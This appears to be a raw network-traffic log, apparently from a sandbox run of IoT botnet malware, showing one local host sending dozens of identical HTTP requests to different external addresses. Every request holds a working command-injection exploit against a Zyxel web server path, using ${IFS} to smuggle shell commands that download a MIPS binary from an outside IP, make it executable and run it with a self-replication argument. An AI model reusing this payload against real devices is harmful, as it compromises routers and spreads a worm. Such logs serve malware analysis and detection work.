                                    Jan 13, 2024 19:02:51.585560083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8699192.168.2.1335754100.207.112.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585618019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8700192.168.2.1334154158.232.219.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585686922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8701192.168.2.134357040.83.174.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585738897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8702192.168.2.135672641.56.92.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585787058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8703192.168.2.1353596172.149.95.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585853100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8704192.168.2.1347028187.158.206.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585905075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8705192.168.2.133440451.37.223.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.585966110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8706192.168.2.133837265.153.102.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586002111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8707192.168.2.135856620.34.98.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586074114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8708192.168.2.1334624131.100.86.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586107016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8709192.168.2.135286899.143.202.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586172104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8710192.168.2.134364278.111.9.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586218119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8711192.168.2.134498654.200.186.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586255074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8712192.168.2.133759643.101.128.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586293936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8713192.168.2.1342496158.88.26.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586359978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8714192.168.2.134362431.179.101.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586419106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8715192.168.2.135379295.66.162.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586493969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8716192.168.2.1356340188.24.180.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586534023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8717192.168.2.134563820.165.232.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586565018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8718192.168.2.1339356186.124.112.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586628914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8719192.168.2.13449228.72.166.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586704016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8720192.168.2.1356482111.219.112.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586735010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8721192.168.2.1354636213.164.112.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586819887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8722192.168.2.135001425.200.212.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586864948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8723192.168.2.1337594188.179.255.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586930037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8724192.168.2.133333674.101.15.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.586998940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8725192.168.2.134322669.176.241.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587047100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8726192.168.2.1337392176.51.190.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587107897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8727192.168.2.1344200211.237.83.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587167025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8728192.168.2.1355248112.218.130.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587218046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8729192.168.2.134014648.19.119.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587281942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8730192.168.2.1333916185.203.194.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587315083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8731192.168.2.1349614130.102.119.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587383986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8732192.168.2.135780223.187.202.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587420940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8733192.168.2.1349234130.50.88.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587491035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8734192.168.2.1335600159.229.75.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587548971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8735192.168.2.135764620.101.240.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587579966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8736192.168.2.1346110180.226.46.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587644100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8737192.168.2.136083042.217.147.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587713957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8738192.168.2.1356182121.73.171.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587780952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8739192.168.2.1347244173.214.140.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587812901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8740192.168.2.1345864101.230.192.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587874889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8741192.168.2.1358590202.144.171.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587953091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8742192.168.2.1360728102.68.213.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.587994099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8743192.168.2.1352344216.152.149.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588043928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8744192.168.2.1335738220.48.1.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588072062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8745192.168.2.1349060204.114.11.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588109016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8746192.168.2.135334057.64.243.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588171005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8747192.168.2.1356322109.46.142.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588223934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8748192.168.2.134686261.166.254.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588290930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8749192.168.2.1341172221.90.13.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588316917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8750192.168.2.135892218.45.158.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588370085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8751192.168.2.1335076114.5.20.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588429928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8752192.168.2.136083293.71.163.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588490963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8753192.168.2.1349978164.110.110.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588556051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8754192.168.2.1346208161.43.55.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588620901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8755192.168.2.1333424169.123.161.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588664055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8756192.168.2.134905424.176.179.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588710070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8757192.168.2.133453824.145.7.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588752985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8758192.168.2.1341910155.67.14.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588820934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8759192.168.2.1348942151.55.190.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588897943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8760192.168.2.136021259.73.200.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:51.588962078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8761192.168.2.135140477.1.220.111443
                                    TimestampBytes transferredDirectionData
